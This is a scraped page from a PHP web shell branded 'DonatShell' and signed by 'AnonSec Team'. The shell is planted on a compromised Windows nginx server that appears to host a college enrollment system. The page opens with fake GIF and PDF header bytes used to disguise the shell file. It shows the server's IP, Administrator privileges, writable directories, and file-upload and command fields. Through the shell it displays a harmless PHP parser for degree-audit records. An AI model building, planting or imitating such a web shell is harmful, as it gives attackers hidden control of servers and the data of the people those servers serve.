GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Admin/Enrollment/parse/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Admin/Enrollment/parse/parseDARS_42As_c.phpinc
<?
// Admin/Enrollment/parse/parseDARS_42As_c_.phpinc
// Parse state 42 As
// Parse Ed Plan section.
// Searching for:
// ['DepartmentTaken'] ['NumberTaken'] ['Department'] ['Number']

$sectionClassIndexPrevious = $sectionClassIndex - 1;

#printVar("$index: \$f_DARSln",$f_DARSln); #printVar('$f_DARSlnAsize',$f_DARSlnAsize); printVar('$f_DARSlnA',$f_DARSlnA);
#printVar('$sectionName',$sectionName);
#printVar('$sectionClassIndexPrevious',$sectionClassIndexPrevious);
#exit;

if ( !$f_error ) {
	switch ( $f_DARSlnA[0] ) {
		case 'Sub':
			if ( $f_DARSlnAsize == 4 && $f_DARSlnA[1] == 'for' ) {
				$DARS['Section'][$sectionName]['Class'][$sectionClassIndexPrevious]['DepartmentTaken'] = $DARS['Section'][$sectionName]['Class'][$sectionClassIndexPrevious]['Department'];
				$DARS['Section'][$sectionName]['Class'][$sectionClassIndexPrevious]['NumberTaken'] =$DARS['Section'][$sectionName]['Class'][$sectionClassIndexPrevious]['Number'];
				$DARS['Section'][$sectionName]['Class'][$sectionClassIndexPrevious]['Department'] = $f_DARSlnA[2];
				$DARS['Section'][$sectionName]['Class'][$sectionClassIndexPrevious]['Number'] = $f_DARSlnA[3];
			} else {
				$f_error = __LINE__;
			}
			break;
		default:
			$f_error = __LINE__;
	}
	if ( $f_error ) { $f_error = 'DARS section line type '.$f_DARSlnA[0].' '.$f_DARSlnA[1].' not programmed for.<span class=\"pv_fl\"> '.basename(__FILE__).':'.$f_error.'</span>'; }
	#printVar("\$DARS['Section'][$sectionName]['Class'][$sectionClassIndexPrevious]",$DARS['Section'][$sectionName]['Class'][$sectionClassIndexPrevious]);
}
?>

Anon7 - 2022
AnonSec Team